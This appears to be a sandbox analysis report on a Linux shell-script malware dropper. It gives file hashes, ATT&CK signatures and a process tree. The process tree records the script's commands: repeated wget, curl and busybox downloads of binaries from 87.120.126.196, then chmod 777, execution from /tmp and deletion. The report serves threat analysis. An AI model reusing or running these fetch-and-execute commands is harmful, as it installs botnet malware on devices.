Analysis
-
max time kernel
32s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
21/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
-
Size
10KB
-
MD5
bd77f6652549a8b0545e6296982a1ac8
-
SHA1
1b2fba63b17d3b1b6408006f4fd88c0774f434ce
-
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
-
SHA512
7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
-
SSDEEP
96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod
PIDs: 1589, 1523, 1529, 1559, 1631, 1681, 1577, 1595, 1601, 1637, 1553, 1583, 1625, 1643, 1675, 1541, 1613, 1619, 1535, 1571, 1649, 1565, 1607, 1661, 1687, 1547, 1655, 1669
-
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
1593 curl
1594 busybox
1596 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
1597 rm
1616 wget
1617 curl
1618 busybox
1592 wget
1621 rm
1620 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh1⤵PID:1514
-
/bin/rm/bin/rm bins.sh2⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1522
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1525
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1526
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1528
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1534
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1540
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1546
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1552
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1558
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1564
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1570
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1576
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1582
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1588
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1594
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1596
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1597
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1600
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1606
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1612
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1618
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1620
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:1621
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1624
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1630
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1636
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1642
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1648
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1654
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1657
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1660
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1663
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1666
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1674
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1677
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1678
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1680
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1683
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1684
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Writes file to tmp directory
PID:1685
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1686
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:1688
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1689
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97